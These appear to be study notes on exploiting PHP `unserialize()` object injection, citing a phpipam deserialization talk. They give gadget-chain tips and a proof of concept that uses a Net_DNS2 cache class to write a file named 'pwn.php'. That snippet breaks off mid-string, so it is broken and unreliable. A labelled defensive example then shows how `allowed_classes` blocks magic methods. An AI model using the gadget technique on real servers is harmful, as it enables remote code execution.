The `unserialize()` function called on untrusted data.
Find magic methods and determine whether they do something useful. Objects can be nested.
Otherwise use pre-built object gadgets for common libraries.
Eldar’s Presentation on phpipam deserialization
- The "*" in a serialized object prevents modifying protected properties. If we remove it, we can then modify those fields.
- Initial proof of concept:

```php
<?php
include("Cache.php");
include("Cache/File.php");

// Instantiate the cache class, dump it, then print its serialized form.
$p = new Net_DNS2_Cache_File();
print_r($p);
print "\n\n" . serialize($p);
?>
```

+ pwn.php

```php
<?php
include("Cache.php");
include("Cache/File.php");
$p=new Net_DNS2_Cache_File();
$p->open("pwn.php", 100000);
$p->put("
?>
```
- Check offsets as those might need to be manually modified.
- Initialising class rather than a generic PHP object.
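
The following is an added example, not code from the presentation or from phpipam: it shows the "*" marker on a protected property in serialized form and how the `allowed_classes` option of `unserialize()` stops magic methods from running on untrusted input. `DemoCache`, `visible()`, `load_unsafe()` and `load_hardened()` are hypothetical names constructed for this demonstration (PHP 7.4 or later assumed).

```php
<?php
// Constructed stand-in for a library class whose destructor has a side effect.
class DemoCache
{
    public static array $events = [];      // records destructor calls (harmless)
    protected string $file = 'cache.tmp';  // protected: serialized as "\0*\0file"

    public function __destruct()
    {
        self::$events[] = "destructor ran for {$this->file}";
    }
}

// Make the NUL bytes around "*" visible so the property name can be read.
function visible(string $s): string
{
    return str_replace("\0", '\0', $s);
}

// Unsafe pattern: any class named in the input is instantiated.
function load_unsafe(string $data)
{
    return unserialize($data);
}

// Hardened pattern: no class is instantiated, so no magic method can fire.
function load_hardened(string $data)
{
    return unserialize($data, ['allowed_classes' => false]);
}

$obj  = new DemoCache();
$blob = serialize($obj);
// The string length prefix of the property name counts both NUL bytes.
echo visible($blob), "\n";
unset($obj);                       // destructor of the original object runs here

DemoCache::$events = [];           // reset before comparing the two loaders
$o = load_unsafe($blob);
unset($o);                         // destructor runs on state taken from the input
$unsafe = count(DemoCache::$events);

DemoCache::$events = [];
$o = load_hardened($blob);
$class = get_class($o);            // placeholder class, has no destructor
unset($o);
$hardened = count(DemoCache::$events);

printf("unsafe: %d destructor call(s); hardened: %d (%s)\n", $unsafe, $hardened, $class);
```

Where a few classes really must be restored, `allowed_classes` also accepts an explicit list of class names. For data that crosses a trust boundary, a format such as JSON avoids object instantiation altogether.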
